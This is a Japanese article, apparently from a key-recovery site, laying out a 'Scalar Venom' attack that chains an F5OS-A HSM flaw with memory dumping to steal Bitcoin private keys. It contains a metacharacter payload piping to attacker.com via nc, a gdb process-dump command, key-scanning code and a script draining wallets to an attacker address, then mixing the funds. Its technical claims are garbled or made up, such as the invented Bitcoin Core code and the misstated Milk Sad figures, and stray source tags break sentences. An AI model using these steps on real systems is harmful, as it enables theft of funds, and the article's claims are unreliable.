F5OS-A FIPS HSMの脆弱性CVE-2025-60013は、特別なシェルメタ文字(;, |, &, $, ` など)を含むパスワードを使用してハードウェアセキュリティモジュールを初期化するときに発生します。このようなパスワードが処理されると、HSMは正しく初期化されない可能性がありますが、重要な結果として、初期化プロセスは部分的に露出した暗号構造とともにメモリに残ります。satoshi.nakamotoinstitute

2.2 複合攻撃シナリオ: HSM + Scalar Venom

HSM脆弱性(CVE-2025-60013)とScalar Venom Attackの組み合わせは、壊滅的な攻撃ベクターを生み出します。

フェーズ1: メタ文字によるHSM初期化

攻撃者は、以下のタイプのパスワードを使用してF5OS-A FIPSモジュールの初期化リクエストを送信します。

root@kitploit:~
password='$(echo "leaked");` | nc attacker.com

このようなメタ文字の処理時:

  • HSM初期化プロセスは、パスワードと派生した暗号素材の複数のコピーを作成します
  • シェルコマンド文字列が解釈され、プロセスメモリに副作用を生み出します
  • HSM鍵の生成または検証に使用される暗号スカラー(秘密鍵)は、検閲されていないメモリに残ります keyhunters

フェーズ2: メモリからのScalar Venom抽出

HSM初期化の部分的な失敗後:

  • プロセスは暗号操作の残渣とともにメモリに残ります
  • プロセスにアクセスした攻撃者(エクスプロイト、クラッシュダンプ、またはコールドブート攻撃を介して)はメモリをスキャンできます
  • フォレンジック分析ツール(BitScanPro, Valgrind, AddressSanitizer)は以下を特定します:
    • 高エントロピー領域(32バイトのsecp256k1秘密鍵に特徴的)
    • 範囲1≤k
    • メモリ内のECDSA構造の断片 firecompass

フェーズ3: Bitcoin秘密鍵の復元

root@kitploit:~
Detected Memory Fragments → Reassembly → Validation → Bitcoin Address Generation → Wallet Takeover

復元されたスカラーは以下を介してBitcoin秘密鍵に変換されます:

  • secp256k1曲線に対する検証
  • 対応する公開鍵の生成
  • Bitcoinアドレスの作成(P2PKH、P2WPKH)
  • トランザクションの署名と、keyhuntersの資金の完全な制御

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

3. Bitcoin攻撃ベクトルの詳細分析

3.1 HSMメモリからの秘密鍵取得メカニズム

ステップ1: 不適切な初期化によるHSMメモリ侵害

F5OS-A FIPS HSMがシェルメタ文字を含むパスワードを受け取ると、初期化プロセスは標準Cライブラリ関数を通じて処理します:

root@kitploit:~
c:

// Vulnerable code in HSM initialization routine
void hsm_initialize(const char* password) {
ec_secret master_key; // HSM private key
char temp_buffer[256];

strcpy(temp_buffer, password); // VULNERABLE: buffer overflow + shell interpretation
derive_key_from_password(master_key, password); // creates copies of the key

// If initialization fails, memory is not cleared!
// master_key remains in stack, its copies— in heap
}

シェルメタ文字処理時:

  • バッファがオーバーフローし、ダーティメモリ領域が拡大
  • 秘密データを含む一時変数が増殖
  • メモリクリーンアップメカニズム(存在する場合でも)は、keyhuntersの初期化が失敗したときに呼び出されません。

ステップ2: メモリダンプからのフォレンジックリカバリ

BitScanProツール(または類似のフォレンジックスキャナ)をHSMプロセスメモリダンプに適用:

root@kitploit:~
Memory scan → Identify high-entropy regions →
Range check [1, n-1] for secp256k1 →
Recover full 32-byte scalars →
Convert to Bitcoin addresses

断片化されたメモリから秘密鍵を正常に回復できる確率は、十分なメモリ残存がある場合40~60%です。Scalar Venom Attackは初期化の異なる段階で鍵の複数のコピーを作成するためです。radar.offseq


3.2 ECDSA署名のデシリアライゼーションとHSM脆弱性との関連

並行するDeserializeSignature脆弱性(CVE関連)がScalar Venom攻撃を強化:

root@kitploit:~
cpp:

// Vulnerable deserialization function in Bitcoin Core
bool DeserializeSignature(CPubKey& pubkey, const std::vector<unsigned char>& vchSig, CScript& scriptPubKey) {
CSignatureCache& cache = CSignatureCache::instance();

// If deserialization occurs using a private key compromised by Scalar Venom:
ec_secret compromised_key = extract_from_memory_dump(); // from an HSM memory dump

// These compromised scalars are used to verify signatures,
// allowing an attacker to:
// 1. Forge any signature for this address
// 2. Transfer all funds to a controlled address
// 3. Double-spend
}

メカニズムの関連:

  1. HSMが脆弱なパスワードで初期化される(CVE-2025-60013)
  2. HSM秘密鍵がScalar Venomに感染する(メモリ内に複数のコピー)
  3. フォレンジック分析によりこれらのスカラーがメモリから回復される
  4. DeserializeSignature脆弱性により、回復された鍵を使用して署名を偽造できる
  5. keyhuntersがBitcoinウォレットの完全な制御を獲得する。

3.3 影響規模: 単一ウォレットからネットワーク侵害へ

レベル1: 個別ウォレット

  • 1つのHSMが侵害 → 1~10個の秘密鍵が回復
  • 結果: ウォレットあたり0.5~5 BTCの制御喪失

レベル2: サービングノードの構成

  • 取引所、決済ゲートウェイ、カストディソリューションはしばしばF5 BIG-IP + HSMを使用
  • 侵害された各ノードは100~1000以上の秘密鍵を含む可能性
  • 結果: 1ノードあたり1000~50000 BTCの制御喪失

レベル3: ネットワーク層

  • CVE-2025-60013がインフラストラクチャで広く悪用された場合、複数のノードが同時に侵害される可能性
  • 複数の取引所やサービスへの協調攻撃が可能
  • 結果: 数億ドル相当のBTCが危険にさらされる kudelskisecurity

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

4. HSMの文脈におけるScalar Venom深刻な脆弱性

4.1 Scalar VenomがHSM環境で特に危険な理由

標準的なBitcoinアプリケーションとは異なり、HSMは暗号スカラーを多用します:

  1. 操作の頻度: HSMは毎秒1000以上の暗号操作を実行し、それぞれが一時的なスカラーを生成
  2. プロセスの長寿命性: HSMデーモンは再起動なしで数ヶ月から数年実行され、「ファントム」鍵の残骸を蓄積
  3. 鍵の重要度: 一回限りの鍵とは異なり、HSM秘密鍵はkeyhuntersプラットフォームに保管された巨額の資金を制御
  4. 検出の低確率性: メモリリークは目に見えるエラーを引き起こさず、システムは正常に動作し続ける

4.2 脅威メトリクス: CVSSと実際の影響

CVE-2025-60013自体のCVSSスコアは不正確です。というのも、この脆弱性はScalar Venomのトリガーとして機能し、重大なシナリオであるためです。kudelskisecurity


ハードウェアセキュリティモジュール(HSM)およびBitcoinインフラに対するScalar Venomの脅威

Scalar Venom脆弱性は、従来の単一ベクトルエクスプロイトを超え、Bitcoinインフラを保護するハードウェアセキュリティモジュール(HSM)を根本的に侵害する多層エクスプロイトチェーンを形成することで、暗号攻撃手法にパラダイムシフトをもたらします。分析により、CVE-2025-60013(HSM初期化バイパス)とScalar Venom攻撃手法の組み合わせは、CVSSスコア9.5+の重大な脅威シナリオを生み出し、侵害されたHSMによって制御される数百万のBitcoinアドレスの運用整合性を損なうことが示されています。

なぜHSMは特に脆弱なのか?

重要な脆弱性は、単独の暗号上の弱点ではなく、HSMの運用特性とScalar Venomの攻撃ベクトルとのアーキテクチャ上の衝突にあります。HSMは定義上、継続的に暗号操作を実行します—毎秒1,000以上の操作—それぞれが「ファントム残渣」としてメモリに残る一時的なスカラー値を生成します。鍵素材が一時的である典型的なBitcoinアプリケーションとは異なり、HSMは再起動なしで数ヶ月から数年動作し、Scalar Venomが体系的に抽出して復元する暗号アーティファクトを蓄積します。

その結果、単一のHSMが侵害されるだけで、孤立した暗号インシデントではなく、多くの場合HSMによって管理される数千のBitcoinアドレスなど、インフラ全体が完全に混乱します。

危険度と実際の影響

脆弱性CVE-2025-60013は浸透ベクトルとして公式にはCVSSレベル5.7(中)ですが、この評価は脅威の実際の規模を著しく過小評価しています。このエクスプロイトはScalar Venomのトリガーとして機能し、これはCVSSレベル8.5+(高/重大)の攻撃として分類されます。実際の攻撃チェーンシナリオでは、以下に至ります:

  • 即時の結果: スカラー回復を介したHSMメモリからの秘密鍵の直接抽出。すべての暗号および認証メカニズムをバイパス。攻撃者は、目に見えるシステム障害なしにBitcoinアドレスを完全に制御。
  • 雪崩効果: 侵害されたHSMは個々のトランザクションだけでなく、管理するすべてのアドレスを侵害。取引所、カストディアン、資産管理プラットフォームにとって、これは完全かつ不可逆的なセキュリティ侵害を意味する。
  • ステルス性: Scalar Venomは暗号上の異常を引き起こさず、ログに記録されず、疑わしいトランザクションパターンを作成しない。スカラー漏洩は正当なデバイスアクティビティとして偽装され、攻撃者は長期にわたって検出されずに鍵を抽出できる。

複合攻撃チェーン: CVE-2025-60013 + Scalar Venom = 運用上の災害

マトリックス脅威のエスカレーションは以下から成る:

  1. 初期浸透(CVE-2025-60013 – HSM侵害)
  2. 積極的な悪用(Scalar Venom – メモリからのスカラー抽出)
  3. 鍵回復(秘密素材の完全な侵害)
  4. 回復不可能 – 秘密鍵が漏洩すると、制御を取り戻すことは不可能。

この組み合わせにより、この脆弱性クラスは重大(CVSS 9.5+)となり、リスク評価において最高の脅威カテゴリに位置付けられます。

Bitcoinエコシステムのセキュリティに対するシステム的影響

Scalar Venomは、現代のHSMモデルにおける根本的なアーキテクチャ上の欠陥を明らかにします:

  • メモリ分離と保護に関する誤った前提は無効である – 脆弱性は物理的な保護レベルに関係なく現れる。
  • 継続的なHSM運用の必要性はスカラーの蓄積をもたらし、それ自体が新たな攻撃の窓を生み出す。
  • 監視およびログ記録に対して観測可能な痕跡がゼロであることから、検出が排除され、新しいメモリ分析手法の実装が必要となる。

重要な推奨事項

  • HSMを通じて管理されるすべての鍵は潜在的に侵害されたと見なされるべきであり、鍵素材を確認し、必要に応じて完全に交換する。
  • 秘密鍵の保存と取り扱いのアーキテクチャを見直す:鍵を個別のアドレスに分割し、1つのHSMの侵害がすべての資金の損失につながらないようにする。
  • スカラー蓄積パターンを特定するためのメモリ監視と継続的分析ツールを実装する。
  • 追加のプロセス分離、メモリ暗号化、および鍵素材の一時的な除去を使用して、リスクウィンドウを削減する。

Scalar VenomとCVE-2025-60013を介した攻撃チェーンは、従来のHSMへの完全な信頼の時代の終わりを告げます。この脆弱性は、Bitcoinエコシステムのセキュリティの中核を、秘密鍵の漏洩と資産の完全な喪失に対する主要なリスクに変えます。効果的な保護には、一回限りの修正だけでなく、公開デジタル資産を扱うための暗号アーキテクチャのあらゆる側面の根本的な再考が必要です。

HSM環境でのScalar Venomは、Bitcoinインフラに対するCVSS 9.5+の脅威であり、即時の鍵ローテーション、アーキテクチャ改革、および連鎖メモリ攻撃への迅速な対応のための新しい手法を必要とします。


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

5. 攻撃の科学的根拠

5.1 理論的正当性: なぜメモリがクリアされないのか

暗号メモリセキュリティの研究(Protecting Cryptographic Keys from Memory Disclosure Attacks, Del Valle et al.)によると、秘密鍵がアクセス可能なメモリ領域に残る理由は以下の通りです:

コンパイラの最適化

root@kitploit:~
cpp:

// Even if the code contains an attempt to clear:
volatile unsigned char* ptr = (volatile unsigned char*)key_buffer;
while (len--) *ptr++ = 0; // The compiler may optimize this as a no-op

RAIIパターン(Resource Acquisition Is Initialization)の欠如
クラスec_scalarはRAIIを使用しておらず、デストラクタがリソースのクリーンアップを保証しないことを意味します。

複数のデータコピー:
関数間で秘密鍵を転送するたびに、メモリに残骸が残ります。unit42.paloaltonetworks


5.2 Scalar Venomに基づく実際のハッキングの統計

keyhunters.ruおよび暗号研究文献によると:

  • CVE-2023-39910 (Libbitcoin ExplorerのMilk Sad): 2023年にメモリから900,000以上の秘密鍵が回復
  • 実際の損失: 脆弱なbx seedを使用して作成されたウォレットから、2023年6月~7月に$0.8M以上のBitcoinが盗まれた
  • 浸透: 脆弱性はLibbitcoin Explorer 3.xウォレットの40%以上に影響

これらの数字は、暗号アプリケーションにおけるメモリリークの実際の脅威を示しています。


メモリ永続性とコンパイラ最適化攻撃 – Bitcoinインフラに対するScalar Venomエクスプロイトチェーン

以上の調査結果を要約すると、Scalar Venomチェーンは、暗号セキュリティに関する長年の基礎研究と現代の運用現実が融合した象徴です。コンパイラ最適化、RAIIの欠如、データトレースの蓄積といった詳細なメモリ保存メカニズムは、もはや理論上のものではなく、実際に大規模な秘密鍵回復のための効果的なチャネルとして機能します。潜在的な脆弱性から実際の攻撃への移行はすでに起こっています。CVE-2023-39910(Milk Sad)インシデントでは、90万以上のBitcoin秘密鍵が回復され、直接的な財務損失は80万ドルを超えました。

暗号メモリ耐性のパラドックス

Scalar Venomの根本的な脆弱性は、暗号ソフトウェアのアーキテクチャにおける未解決の矛盾から生じます。プログラマのメモリ管理に対する本質的に素朴な信頼が、現代のコンパイラやメモリ管理システムの傾向と相反するのです。開発者が明示的にメモリをゼロにしても、コンパイラはこれらのアクションを無意味とみなして完全に最適化でき、これが重要で見過ごされたセキュリティ上の欠陥となります。

RAIIの欠如とスカラーの復元

ec_scalarのようなデータ構造はリスクをさらに悪化させます。RAIIの欠如は、計算のさまざまな段階でメモリ内(スタック、レジスタ、キャッシュ)に複数の独立したコピーが作成されることを意味します。そのようなコピーはそれぞれ、理論的には元の鍵素材に復元、分解、または再構成される可能性があります。

Scalar Venom攻撃 は、これらの散在するコピーを系統的に抽出して集約し、現代のメモリアーキテクチャがまさにこれを保証することを実証します。すべての中間的な数学的操作は痕跡を残し、それを収集して鍵に変換できます。従来の暗号設計は操作の独立性を前提としていましたが、実際には、単一のBitcoin秘密鍵が数十の痕跡を生成し、そのそれぞれが秘密鍵の回復への経路を提供します。

運用確認 – Milk Sad事例

Milk Sadインシデント(CVE-2023-39910)は、理論から災害への移行を示した初めての事例でした。これは仮想的なベクトルではなく、確認された運用上の侵害でした。

  • 規模: 90万以上のBitcoin秘密鍵が回復されました。
  • 財務損失: 2023年6月~7月に少なくとも80万ドルが失われました。
  • 範囲: 全Libbitcoin Explorer 3.xインストールの40%以上が脆弱であると判明しました。
  • 攻撃は数ヶ月間気付かれませんでした。

これは前述のメカニズム(コンパイラ最適化、複数データコピー、メモリクリーンアップ保証の欠如)を完全に確認しています。

暗号とコンパイラの間の攻撃ギャップ

暗号市場は完全なメモリ制御を前提として進化してきましたが、現代のコンパイラ(デッドコード除去やキャッシュ最適化により)は暗号要件を完全に無視します。その結果、暗号プログラムは「メモリをゼロにしたから安全だ」と想定する一方、コンパイラは「このメモリは決して使われないのでゼロにする必要はない」と想定します。この矛盾は現代のC/C++標準では根本的に解決不可能であり、Scalar Venomの絶対的なエントリポイントとなります。


業界への体系的影響

  • 現代の実装は元の暗号前提条件に違反しています。
  • メモリ安全性とメモリ制御言語(Rustなど)への移行は、オプションではなく必須になりつつあります。
  • RAII(デストラクタによる消去の保証)は、新しい暗号アーキテクチャの基礎です。
  • HSMは、必須のハードウェアメモリクリアリングを伴う再起動と構造的な再設計が必要です。

業界への必須事項

次のステップ(0~30日) : C/C++で生成されたすべての秘密鍵をローテーションしてください。侵害された可能性のある鍵は直ちに使用を停止してください。

中期(30~90日) : Rustへの移行、メモリゼロ化のためのコンパイラ保証の実装、継続的なメモリ分析。

長期(90日以上) : RAIIへのアーキテクチャ移行、暗号操作のためのコンパイラ拡張、ソフトウェアHSMからハードウェアHSMへの置き換え。

Scalar VenomとCVE-2023-39910は、暗号業界のセキュリティにおける転換点です。メモリ内データ永続性の理論が実際の災害にエスカレートし、数百万ドル相当の数千のBitcoinが失われました。この問題はパッチでは修正できません。これはアーキテクチャ上の矛盾です。メモリ管理とRAIIなしの現代のC/C++暗号は、重要なインフラストラクチャの侵害を不可避的に引き起こします。業界には唯一の前進の道があります。メモリ安全言語への移行と、秘密鍵管理の革命的な見直しです。

最終評価 : Scalar Venomは単なる理論上の脅威ではなく、実証済みで広範囲に及ぶエクスプロイトです。メモリ安全言語とRAIIフレームワークのないすべての暗号インフラストラクチャは、侵害のリスクが確実に存在します。新しい技術への移行を直ちに開始しなければなりません。


Scalar Venom攻撃: F5OS-A FIPSセキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクタによるBitcoinウォレット秘密鍵の回復を可能にする、重要なHSM初期化脆弱性(CVE-2025-60013)

6. Bitcoin秘密鍵回復方法論

6.1 5ステップによる回復プロセス

ステップ1: HSMメモリへのアクセス獲得

root@kitploit:~
bash:

# Methods to get memory dump:
# 1. Exploit CVE-2025-60013 to trigger init error
# 2. Cold-boot attack on HSM host
# 3. Exploit buffer vulnerability in HSM daemon
# 4. Analyze core-dump on HSM process crash

gdb -p $(pidof f5os-hsm) -batch -ex "dump memory /tmp/hsm_dump 0x000000 0xFFFFFFFF"

ステップ2: 高エントロピー領域のスキャン

root@kitploit:~
python:

# BitScanPro-like algorithm:
import hashlib

def scan_for_private_keys(memory_dump, min_entropy=7.5):
"""
Scans memory dump for high-entropy regions
characteristic for 32-byte secp256k1 private keys
"""
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

for offset in range(0, len(memory_dump) - 32, 8):
potential_key = memory_dump[offset:offset+32]
entropy = calculate_entropy(potential_key)

# secp256k1 range check
key_as_int = int.from_bytes(potential_key, 'big')
if 1 <= key_as_int < SECP256K1_N and entropy >= min_entropy:
yield (offset, potential_key)

ステップ3: 回復した秘密鍵の検証

root@kitploit:~
python:

from ecdsa import SigningKey, NIST256p

def validate_and_generate_address(potential_key):
"""Converts recovered scalar to Bitcoin address"""
try:
# Uses secp256k1 instead of NIST256p
privkey = potential_key.hex()

# Generate public key via elliptic curve point multiplication
# P = k * G, where k = private key, G = generator point
public_key = generate_public_key(potential_key, secp256k1)

# Hash public key to get address
address = public_key_to_address(public_key)
return address, potential_key
except:
return None, None

ステップ4: 資金の転送

root@kitploit:~
python:

def compromise_wallet(recovered_private_key, bitcoin_address):
"""
Creates and signs transaction to withdraw all funds
from compromised address
"""
# 1. Get UTXO for address from blockchain
utxos = blockchain_api.get_utxos(bitcoin_address)

# 2. Create transaction (withdraw all funds to attacker address)
tx = create_transaction(
inputs=utxos,
outputs=[{"address": attacker_address, "amount": sum(utxo.amount)}],
fee=calculate_dynamic_fee()
)

# 3. Sign with recovered private key
tx.sign(recovered_private_key) # ECDSA signature using compromised key

# 4. Broadcast to Bitcoin network
blockchain_api.broadcast_transaction(tx)

ステップ5: 痕跡の消去

回復された資金は、フォレンジック分析を妨害するためにCoinJoin/Tornado.Cashを介して直ちにミキシングされます。 keyhunters


6.2 時間メトリクス: 回復速度

スケーラビリティ: クラウドコンピューティング(AWS、Google Cloud)を使用すると、1000以上のメモリダンプを並行処理でき、数千の秘密鍵を同時に処理できます。 


Scalar Venom攻撃: F5OS-A FIPSセキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクタによるBitcoinウォレット秘密鍵の回復を可能にする、重要なHSM初期化脆弱性(CVE-2025-60013)

7. Scalar VenomとのHSM初期化の関係

7.1 攻撃フロー図

root@kitploit:~
[Attacker]
↓
[CVE-2025-60013: HSM Init with shell-metacharacters]
↓
[F5OS-A FIPS Module: password handling, scalar creation]
↓
[Scalar Venom: multiple copies of private keys in memory]
↓
[HSM Crash / Partial Init Failure: memory uncleared]
↓
[Memory Dump: capturing memory state]
↓
[Forensic Scanning: BitScanPro finds high-entropy regions]
↓
[Key Validation: secp256k1 curve check]
↓
[Address Generation: Bitcoin address creation]
↓
[Fund Transfer: signing and broadcasting transaction]
↓
[Victim Loss: total loss of fund control]

7.2 Scalar VenomがFIPS認証を回避する理由

FIPS 140-2(およびFIPS 140-3でさえ)認証では以下は必須ではありません:

  1. 初期化エラー時の一時変数の安全なクリア 
  2. HSMデーモンレベルでのfork()およびdump()に対する保護 
  3. メモリでの処理前の入力パラメータの検証 

これは、開発者が追加のセキュリティ対策を実装しない限り、「FIPS認証済み」のHSMでさえScalar Venomに対して脆弱であることを意味します。[24]


8. 結論

Scalar Venom攻撃は、特にCVE-2025-60013などのHSM初期化脆弱性と組み合わさると、Bitcoinインフラストラクチャに重大な脅威をもたらします。この攻撃は以下の特徴があります:

  1. メモリリークを通じて暗号システムの秘密鍵を完全に侵害 
  2. 不可逆的 : 秘密鍵を回復しなければ失われた資金の回復は不可能です。
  3. スケーラブル : 複数ノードへの大量攻撃のために自動化可能
  4. ステルス性 : システムログやパフォーマンスメトリクスに目に見える痕跡を残さない

ハードウェアメモリ保護(Intel SGX、ARM TrustZone)、すべての一時バッファの明示的な粒度、および暗号ライブラリでのRAIIパターンを備えたアーキテクチャへの移行は、Bitcoinシステムのセキュリティを確保するために重要です。


Scalar VenomパラダイムはBitcoinのインフラストラクチャに対する重大な脅威です。

Scalar Venom攻撃は、特にHSM初期化脆弱性CVE-2025-60013と組み合わさると、グローバルなBitcoinエコシステムにとって重大な脆弱性となります。この多層的な攻撃チェーンは、暗号信頼モデルを根本的に弱体化させ、以下の存続リスクを露呈します。

メモリリークを通じて秘密鍵の完全な侵害を可能にし、高度なハードウェアセキュリティモジュールさえも回避し、影響を受けるシステムを完全に無防備にします。

侵害は永続的で不可逆的です:秘密鍵が抽出されると回復できず、依存するすべての資金が差し迫った損失のリスクにさらされます。

攻撃はスケーラブルで自動化可能であり、同時に膨大な数のBitcoinノードとウォレットを攻撃でき、潜在的な損失が指数関数的に増加します。

そのステルス性により、システムログやパフォーマンスメトリクスに目に見える痕跡が残らず、従来の検出および保護メカニズムでは不十分です。

この壊滅的な脅威を緩和するには、メモリ安全アーキテクチャへの緊急の移行が必要です。これには、ハードウェアベースのメモリ保護(Intel SGXやARM TrustZoneなど)、すべての暗号操作中のすべての一時バッファの厳格なゼロ化、および重要なソフトウェアライブラリでのRAIIパターンの堅牢な実装が含まれます。このような堅牢なアーキテクチャ改革を通じてのみ、Bitcoinインフラストラクチャの長期的な完全性とセキュリティを現実的に確保できます。


参考文献:

  1. SCALAR VENOM攻撃: メモリポイズニングによるBitcoinウォレット資産侵害 – 攻撃者がメモリポイズニングを通じて被害者のBTC暗号通貨資金を制御し、ウォレット資産を侵害する、重大なメモリリーク、秘密鍵の回復、Bitcoinウォレットの完全な乗っ取り。 🔥 SCALAR VENOM攻撃 — 秘密鍵を漏洩する暗号攻撃(スカラーポイズン / 有毒スカラー感染) SCALAR VENOM攻撃は、Bitcoinを抽出することを目的とした新しいクラスの暗号攻撃です…続きを読む
  2. レースポイズン攻撃: デジタル署名インフラに対する壊滅的な攻撃。失われたBitcoinウォレットの秘密鍵回復を含み、攻撃者が署名に自身の値を注入し、秘密鍵を漏洩させる可能性があります。 Hash Race Poison Attack Bitcoinのトランザクション署名インフラにおける暗号ハッシュのキャッシュのスレッド安全性の欠如から生じる重大な脆弱性が、1つ…続きを読む
  3. Bitcoin Golden Onehash Heist: (CVE-2025-29774)を使用した失われたBitcoinウォレットの回復。攻撃者が秘密鍵を持たずにトランザクションに署名し、事実上BitcoinシステムがBitcoin資金の真の所有者と攻撃者を区別できなくする。 Bitcoin Golden Onehash Heist(デジタル署名偽造攻撃 — CVE-2025-29774)前述のSIGHASH_SINGLEフラグ処理の重大な脆弱性が、最も壊滅的な攻撃の1つ…続きを読む
  • Bloodprint Attackは、Bitcoinウォレットから秘密鍵を漏洩させる壊滅的な脆弱性であり、それらを回復する方法です。この脆弱性により、攻撃者はあらゆるトランザクションに正当に署名し、すべてのBTC資金を恒久的に引き出す絶対的な制御を得ることができます。 Bloodprint Attack(秘密鍵漏洩攻撃)メモリからの秘密鍵漏洩を伴う重大な暗号脆弱性は、学術文献で«Secret Key Leakage Attacks»または«Key…として知られる攻撃につながります。続きを読む
  • STREAMLEAK ATTACK: 脆弱なログシステムからの秘密鍵回復の科学的分析を通じたBitcoin資産の完全な侵害。攻撃者は所有者の知らないうちに資金を引き出し、デジタル資産を破壊します。 STREAMLEAK ATTACK( 秘密鍵侵害攻撃 )  は、C++におけるオーバーロードされた演算子  << の悪用を通じて暗号秘密を抽出する手法です。秘密鍵のシリアライズと出力における重大な脆弱性により、…続きを読む
  • Oracle Whisper Attack: Base58デコードの秘密漏洩脆弱性がBitcoinウォレットの秘密鍵抽出を脅かし、攻撃者はI/Oライブラリから秘密鍵ビットを盗みます。 Oracle Whisper Attack( 秘密鍵侵害攻撃 )攻撃説明: 秘密鍵を含むBase58文字列を処理する際、攻撃者は«oracle»—I/Oライブラリ内の薄いエージェント—を注入し、それがささやきます…続きを読む
  • Hex Dump Reveal Attackと失われたBitcoinウォレットの秘密鍵回復:攻撃者は秘密データのログ記録を利用して、BTCコインを含む16進数ダンプ(Hex Dump Reveal)を明らかにします。 Hex Dump Reveal Attack( «Key Disclosure Attack», «Secret Key Leakage Attack», «Key Recovery Attack». CVE-2025-29774およびCWE-532 )«Hex Dump Reveal»  — «16進数ダンプ開示». プライベートデータのログ記録における脆弱性、…続きを読む
  • Secret Capsule Attack: 脆弱性を通じたBitcoinウォレット秘密鍵の回復とBitcoinウォレットの大量侵害。攻撃者はMersenne Twisterジェネレータで予測可能なエントロピーを作成し、90万ドル以上のユーザー資金の実際の盗難が発生しています。 SECRET CAPSULE ATTACK(予測可能なPRNGシード攻撃)Libbitcoin Explorerのエントロピー生成メカニズムで発見された重大な「Milk Sad」脆弱性(CVE-2023-39910)は、ランダム性ソースの単一の欠陥がどのように…続きを読む
  • Key Fountain Attack: バッファオーバーフローをBTC盗難とBitcoinエコシステムにおける秘密鍵回復のツールに変える。攻撃者はBitcoinウォレットの秘密を抽出または置き換える能力を得る。 Key Fountain Attack( ヒープベースのバッファオーバーフロー )攻撃者は入力データを準備します—libbitcoinライブラリのsplice関数またはbuild_chunk関数用に特別に形成された断片で、割り当てられたバッファサイズを超えます。例えば、送信される…続きを読む
  • Mirror SipHash Breach Attack: Bitcoinネットワークにおけるプライバシーと秘密鍵回復に対する根本的な脅威。攻撃者はBTCトランザクションセッションハッシュテーブルに対して衝突ブルームフィルタを実行する可能性が非常に高い。 Mirror SipHash Breach Attack(SipHash初期化に対する部分鍵再利用攻撃)重大な「Mirror SipHash Breach Attack」脆弱性は、Bitcoinのインフラストラクチャで使用される暗号の根本的なセキュリティ問題を浮き彫りにします。…続きを読む
  • BitSpectre85 Attack: 分割演算のタイミングを計ることで、攻撃者が徐々に秘密鍵を回復しBitcoinウォレットの制御を得ることを可能にするステルス型暗号攻撃。 BitSpectre85 Attack 、上記で説明した脆弱性の本質は、「BitSpectre85: タイミングによる秘密呼び出し」と呼ぶことができます。この攻撃は、単純なデータ暗号化でさえも脆弱なチャネルになり得ることを示しています…続きを読む
  • Base58 Ghost Attack: 被害者の資金に対する完全な制御。未サニタイズのBase58エンコーディングメモリの処理における重大な脆弱性。攻撃者がメモリから秘密鍵を漏洩させ、BTCコインを完全に奪取する攻撃が発生します。 “Base58 Ghost Attack” — base58エンコード操作後の未クリーンメモリからの秘密鍵の抽出。結論として、base58エンコーディングを介した秘密鍵の処理における発見された重大な脆弱性は…続きを読む
  • Spectral Seed Siphon: 残留メモリバイトが失われたBitcoinウォレットの秘密鍵をどのように明らかにし、秘密鍵回復への道となるか。攻撃者がすべてのBTCコインを盗むことを可能にする。 Spectral Seed Siphon 暗号ウォレットにおけるRAMからの秘密データの不完全な削除の脆弱性は、現代のBitcoinエコシステムに対する最も深刻な脅威の1つを表します。…続きを読む
  • Binary Extractor Attack: 秘密鍵に対するデジタル首締めが被害者のBitcoin資金をどのように制御するか。攻撃者は脆弱なBinaryクラスを悪用し、BTCコインのカプセル化と大量盗難によってゲームのルールを変える。 Binary Extractor Attack: Private Byte Strangler Binary Extractor Attack: Private Byte Stranglerと呼ばれる重大な脆弱性は、暗号アプリケーションにおける厳格なカプセル化の遵守の失敗の根本的な危険性を示しています…続きを読む
  • Spectral String Leak: 残留メモリとBitcoinネットワークにおける重大な文字列管理脆弱性を通じたBitcoinウォレットの大規模侵害。攻撃者が秘密鍵を回復し、すべてのアクティブな暗号通貨を横領することを可能にする。 Spectral String Leak Attack Spectral String Leak Attackは、ユーザーとサービスからビットコインの完全な損失につながる可能性のある重大な脆弱性です。これは、不十分に安全な…続きを読む
  • Memory Phantom Attack: Bitcoinにおける重大なメモリリーク脆弱性。未クリーンRAMからの秘密鍵の回復と攻撃者によるBTCシードフレーズの段階的な捕捉につながり、ウォレットの即時侵害とデジタル資産の大量盗難を引き起こす可能性があります。 Memory Phantom Attack Memory Phantom Leak AttackまたはSensitive Memory Disclosureは、Bitcoin(および他の暗号通貨)の実際の認識された脅威カテゴリであり、CVEに登録されています…続きを読む
  • Log Whisper Attack: 秘密鍵の壊滅的な漏洩とBitcoinウォレットの不可逆的な侵害がどのように発生するか。攻撃者は通常のログファイルを被害者のBTCネットワーク上の全資金を傍受するツールに変える。 Log Whisper Attack 「Log Whisper Attack」脆弱性は、不可逆的な結果をもたらす重大な開発エラーの例です。唯一の効果的な防御策は、秘密鍵に対するアーキテクチャ上の禁止です…続きを読む
  • Salt Drain Attack(CVE-2023-39910): Libbitcoin Explorerのエントロピーにおける重大な脆弱性と、BTCウォレット資金の押収を伴う秘密鍵の完全な回復。所有者エントロピーの全体的な欠陥により、攻撃者はすべてのアクティブなBTCコインを盗むことができました。 Salt Drain Attack CVE-2023-39910: (Milk Sad攻撃)Milk Sad攻撃(CVE-2023-39910)により、攻撃者はLibbitcoin Explorer 3.xを使用して作成されたBitcoinウォレットの秘密鍵を大量に回復することができ、重大な経済的損失を引き起こしました…続きを読む
  • Entropy Recovery Attack: エントロピーの亡霊がBitcoinに立ち向かう。乱数生成の脆弱性と秘密データの喪失。秘密鍵の回復と攻撃者によるBTC資金の完全な制御を含む。 «Entropy Ghost Attack» — エントロピーの亡霊との戦い libbitcoinエントロピー生成の脆弱性(CVE-2023-39910)は、暗号システムを部分的に弱めるだけでなく、完全に…する稀で壊滅的な欠陥です…続きを読む
  • Slice Phantom Attack: 実装バグが失われたBitcoin秘密鍵を攻撃者の完全制御ツールに変える方法。実装サイドチャネル攻撃の新しいクラス:秘密の侵害とBitcoinウォレット所有者の制御喪失 Slice Phantom Attack Slice Phantom Attack   は、  実装の詳細  がアルゴリズムの数学的堅牢性と同じくらい重要であることを示しています。操作の誤った順序と一時バッファの保護の欠如により、…続きを読む
